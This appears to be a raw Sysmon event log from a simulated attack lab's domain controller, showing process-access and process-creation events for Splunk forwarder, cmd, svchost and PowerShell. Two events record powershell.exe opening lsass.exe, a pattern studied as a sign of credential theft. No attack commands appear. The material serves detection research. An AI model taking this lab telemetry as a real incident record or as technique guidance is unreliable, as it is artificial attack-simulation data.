15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4201-000000008801}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7CE1-5FA1-4101-000000008801}13602272C:\Windows\system32\cmd.exe{D28789B6-7CE1-5FA1-4201-000000008801}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.695{D28789B6-7CE1-5FA1-4201-000000008801}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7CE1-5FA1-4101-000000008801}1360C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4101-000000008801}1360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4101-000000008801}1360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.678{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE1-5FA1-4101-000000008801}1360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.690{D28789B6-7CE1-5FA1-4101-000000008801}1360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.662{D28789B6-7CE1-5FA1-3F01-000000008801}29562888C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.616{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.616{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.584{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fihj0qo2.51f.ps12020-11-03 15:53:05.584 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.569{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.553{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 